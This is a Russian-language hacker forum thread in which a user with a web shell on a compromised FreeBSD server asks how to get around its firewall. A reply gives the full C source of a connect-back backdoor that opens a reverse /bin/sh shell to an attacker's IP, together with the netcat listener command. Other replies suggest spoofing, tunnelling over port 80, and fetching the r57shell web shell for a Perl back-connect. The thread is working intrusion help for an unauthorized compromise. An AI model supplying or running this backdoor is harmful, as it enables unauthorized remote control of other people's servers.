Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Обойти фаерволл в FreeBSD (https://forum.antichat.xyz/showthread.php?t=12061)

scorpion 23.12.2005 14:00

Обойти фаерволл в FreeBSD
 
Короче висит операционка FreeBSD.У мя есть веб шелл с правами nobody.На системе мне можно применять команду perl.Я когда запускаю какой-нить бинд шелл,то этот порт открывается(видно при команде show opened ports).Но подключиться к этому порту не могу.Интуиция подсказывает на 100%,что там сидит фаерволл.С помощью какого бинд шелла мне его обойти???И где достать этот шелл?

fucker"ok 23.12.2005 16:03

Это во многом зависит от настройки фаервола. Думаю нужно рулить в сторону спуфинга (обычно для локалхоста или локалки разришают больше, чем для интернета), но если в правилах обазначенны устройства (via lo0, via tun0 и тд и тп), то ничего из спуфинга не выйдет.
Подделка ip не даст тебе коннекта на тот комп (вывод не будет возаращатся тебе), но, возможно, ты сможешь выполнять команды (слепо).
:]

virgoz 23.12.2005 18:26

scorpion, юзай Connect-Back Backdoor.
bdw.c
Цитата:

/* Digit-Labs Connect-Back Backdoor
*
* Use this backdoor to access
* machines behind firewalls.
*
* step 1. setup a listening port
* on your box e.g.
* nc -l -p 4000
*
* step 2. Run this file :
* ./cbd <ip_of_listening_machine>
*
* grazer@digit-labs.org
* http://www.digit-labs.org
*
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>

#include <netinet/in.h>
#include <netdb.h>

int fd, sock;
int port = 4000;
struct sockaddr_in addr;

char mesg[] = "\n[ Digit-Labs Connect-Back Backdoor ]\n * Connected to CommandLine...\n";
char shell[] = "/bin/sh";

int main(int argc, char *argv[]) {
while(argc<2) {
fprintf(stderr, "\n\n %s <ip> \n\n", argv[0]);
exit(0);
}


addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);
fd = socket(AF_INET, SOCK_STREAM, 0);

if(connect(fd, (struct sockaddr*)&addr, sizeof(addr))<0)printf("fucker!\n");

send(fd, mesg, sizeof(mesg), 0);

dup2(fd, 0); // thnx dvorak
dup2(fd, 1);
dup2(fd, 2);
execl(shell, "in.telnetd", 0);


close(fd);


return 1;
}
Есть еще пару способов, но этот самый простой...

fucker"ok 23.12.2005 18:31

Что-то я стормозил... Дейсвительно, так проще. :]

scorpion 24.12.2005 00:09

Спасибо вам fucker"ok и virgoz
Обоим по +1 репутации :))))

scorpion 24.12.2005 00:26

VIRGOZ

Слушь как я понял:Мне надо на своём винте запустить nc -l -p 4000 .А на взломаном сервере мне надо будет сделать ./bdw <мой IP> .Прав я???

virgoz 24.12.2005 01:48

scorpion, можно и так. Но для безопасности, я бы запускал netcat на серваке.

SladerNon 26.12.2005 15:02

Добавить можно то, что если back-connect делать на жестко зафорваленной машине, имеет смысл на общедоступных портах...
Топишь как правило 80 порт тут прокатит..

scorpion 29.12.2005 01:26

Слушайте есть ли такой back connect на перл языке.Просто дело в том,что у меня нет прав ./file А запускать перл файл без проблем.Так что мне нужно,чтоб я на своей системе запустил бы nc -l -p 666 ,а на сервере запустил бы перл шелл,который бы подключился бы на мою тачку и так бы я обошёл firewall.Кто-нить можете помочь???

Где взять такой перл шелл???

P.S За хорошую помощь поднимаю репутацию всегда...

fucker"ok 29.12.2005 03:10

А разве твой шел не от rst ? :p
Цитата:

Сообщение от r57shell v1.23
bla bla bla
~ возможность делать back-connect с помощью Perl или С кода
bla bla bla

http://rst.void.ru/index.php?page=releases
http://rst.void.ru/download/r57shell.txt


Время: 15:15